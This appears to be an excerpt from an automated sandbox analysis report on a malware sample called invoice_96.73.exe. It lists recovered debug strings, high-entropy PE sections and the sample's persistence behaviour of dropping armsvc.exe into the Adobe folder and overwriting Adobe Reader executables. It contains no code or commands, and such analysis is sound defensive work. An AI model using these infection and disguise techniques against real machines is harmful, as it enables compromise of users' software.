      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jjs_objs\jjs.pdb source: armsvc.exe, 00000002.00000003.457782973.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.459238005.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\javaw_objs\javaw.pdb source: armsvc.exe, 00000002.00000003.455163285.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vds.pdb source: armsvc.exe, 00000002.00000003.397013643.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.396407942.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\pack200_objs\pack200.pdb source: armsvc.exe, 00000002.00000003.475333705.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.473148665.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, pack200.exe.2.dr
      Source: Binary string: FXSSVC.pdbH source: armsvc.exe, 00000002.00000003.375221834.0000000002110000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.375401545.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ADelRCP_Exec.pdb"" source: armsvc.exe, 00000002.00000003.535376805.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wbengine.pdb source: armsvc.exe, 00000002.00000003.406707369.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.408514012.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.2.dr
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\ssvagent\obj64\ssvagent.pdb source: armsvc.exe, 00000002.00000003.486325519.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: RdrServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.505647536.0000000001520000.00000004.00001000.00020000.00000000.sdmp, RdrServicesUpdater.exe.2.dr
      Source: Binary string: Reader_SL.pdb source: armsvc.exe, 00000002.00000003.562770680.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, reader_sl.exe.2.dr
      Source: Binary string: dllhost.pdb source: armsvc.exe, 00000002.00000003.367049067.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.365429187.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.366371363.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.560950448.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.557364709.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\tnameserv_objs\tnameserv.pdb source: armsvc.exe, 00000002.00000003.489549395.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.487933840.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WMPNetwk.pdb source: armsvc.exe, 00000002.00000003.417582553.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.418441175.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: SearchIndexer.pdb source: armsvc.exe, 00000002.00000003.420532553.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\kinit_objs\kinit.pdb source: armsvc.exe, 00000002.00000003.464557449.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.465983373.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\unpackexe\unpack200.pdb source: armsvc.exe, 00000002.00000003.490456860.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, unpack200.exe.2.dr
      Source: Binary string: chrome_wow_helper.pdb source: armsvc.exe, 00000002.00000003.573489148.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ieetwcollector.pdb source: armsvc.exe, 00000002.00000003.378562857.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.378697876.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroBroker.pdbsTT6 source: armsvc.exe, 00000002.00000003.494060398.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: armsvc.exe, 00000002.00000003.484025303.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.482732897.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.543127259.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\delivery\x64\ship\0\ose.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.549948881.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
      Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000002.00000003.389231981.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390086664.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.389367971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb] source: DW20.EXE.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp, DW20.EXE.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\orbd_objs\orbd.pdb source: armsvc.exe, 00000002.00000003.471060222.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.472762066.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vds.pdbH source: armsvc.exe, 00000002.00000003.397013643.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.396407942.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.410168312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wbengine.pdb@SH source: armsvc.exe, 00000002.00000003.406707369.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.408514012.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.2.dr
      Source: Binary string: ALG.pdb source: invoice_96.73.exe, 00000000.00000003.353143094.0000000002990000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349561520.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349725788.0000000003690000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jabswitch\jabswitch.pdb source: armsvc.exe, 00000002.00000003.444147951.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb00 source: armsvc.exe, 00000002.00000003.557364709.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000002.00000003.383128547.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.383373251.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\keytool_objs\keytool.pdb source: armsvc.exe, 00000002.00000003.461065533.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.464249013.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: Eula.pdb source: armsvc.exe, 00000002.00000003.546479748.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmid_objs\rmid.pdb source: armsvc.exe, 00000002.00000003.482423318.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.480866013.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000002.00000003.377542137.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroRd32Info.pdb source: armsvc.exe, 00000002.00000003.525307374.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java-rmi_objs\java-rmi.pdb source: armsvc.exe, 00000002.00000003.447269346.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.449170797.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, java-rmi.exe.2.dr
      Source: Binary string: mscorsvw.pdb source: armsvc.exe, 00000002.00000003.358919059.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.357934504.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.360197624.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356595540.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356855501.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.357840917.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.359130916.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: Reader_SL.pdb..) source: armsvc.exe, 00000002.00000003.562770680.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, reader_sl.exe.2.dr
      Source: Binary string: E:\r\ws\St_Make\code\build\win\results\FlashPlayerUpdateService\Release\Win32\FlashPlayerUpdateService.pdb source: invoice_96.73.exe, 00000000.00000003.347332988.0000000002A90000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\policytool_objs\policytool.pdb source: armsvc.exe, 00000002.00000003.480547768.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.476508666.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000002.00000003.391469846.0000000002030000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391488401.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392623971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391662820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391640685.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392746098.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391569645.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391549027.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391679575.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: RdrServicesUpdater.pdb;; source: armsvc.exe, 00000002.00000003.505647536.0000000001520000.00000004.00001000.00020000.00000000.sdmp, RdrServicesUpdater.exe.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp, DW20.EXE.2.dr
      Source: Binary string: ieetwcollector.pdbH source: armsvc.exe, 00000002.00000003.378562857.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.378697876.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\toolkit\components\maintenanceservice\maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.382555464.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java_objs\java.pdb source: armsvc.exe, 00000002.00000003.449717212.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, java.exe.2.dr
      Source: Binary string: TextExtractor.pdb source: armsvc.exe, 00000002.00000003.528202244.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ehRecvr.pdb source: armsvc.exe, 00000002.00000003.367743186.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: y\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: armsvc.exe.0.drStatic PE information: section name: .didat
      Source: elevation_service.exe.2.drStatic PE information: section name: .00cfg
      Source: elevation_service.exe.2.drStatic PE information: section name: .gxfg
      Source: elevation_service.exe.2.drStatic PE information: section name: .retplne
      Source: elevation_service.exe.2.drStatic PE information: section name: .voltbl
      Source: elevation_service.exe.2.drStatic PE information: section name: _RDATA
      Source: invoice_96.73.exeStatic PE information: section name: .reloc entropy: 7.876658513199357
      Source: AdobeCollabSync.exe.2.drStatic PE information: section name: .reloc entropy: 7.745437433816161
      Source: ehrecvr.exe.2.drStatic PE information: section name: .reloc entropy: 7.947759158164801
      Source: FXSSVC.exe.2.drStatic PE information: section name: .reloc entropy: 7.938155100469492
      Source: elevation_service.exe.2.drStatic PE information: section name: .reloc entropy: 7.9503349211039165
      Source: sppsvc.exe.2.drStatic PE information: section name: .reloc entropy: 7.942248601296767
      Source: VSSVC.exe.2.drStatic PE information: section name: .reloc entropy: 7.931247010308512
      Source: wbengine.exe.2.drStatic PE information: section name: .reloc entropy: 7.933039646823671
      Source: wmpnetwk.exe.2.drStatic PE information: section name: .reloc entropy: 7.923593696253763
      Source: SearchIndexer.exe.2.drStatic PE information: section name: .reloc entropy: 7.941858190492632
      Source: setup.exe.2.drStatic PE information: section name: .reloc entropy: 7.9408025581316295
      Source: CCleaner.exe.2.drStatic PE information: section name: .reloc entropy: 7.785488048281558
      Source: CCleaner64.exe.2.drStatic PE information: section name: .reloc entropy: 7.927956703420215
      Source: RdrCEF.exe.2.drStatic PE information: section name: .reloc entropy: 7.905381706036114
      Source: Aut2exe.exe.2.drStatic PE information: section name: .rsrc entropy: 7.818525491808237
      Source: Aut2exe_x64.exe.2.drStatic PE information: section name: .rsrc entropy: 7.818635676263212
      Source: AutoIt3_x64.exe.2.drStatic PE information: section name: .reloc entropy: 7.9509701918108
      Source: RdrServicesUpdater.exe.2.drStatic PE information: section name: .reloc entropy: 7.939448077885585
      Source: AcroRd32.exe.2.drStatic PE information: section name: .reloc entropy: 7.920315636020403
      Source: DW20.EXE.2.drStatic PE information: section name: .reloc entropy: 7.94461005915879

      Persistence and Installation Behavior

      barindex
      Drops executable to a common third party application directory
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
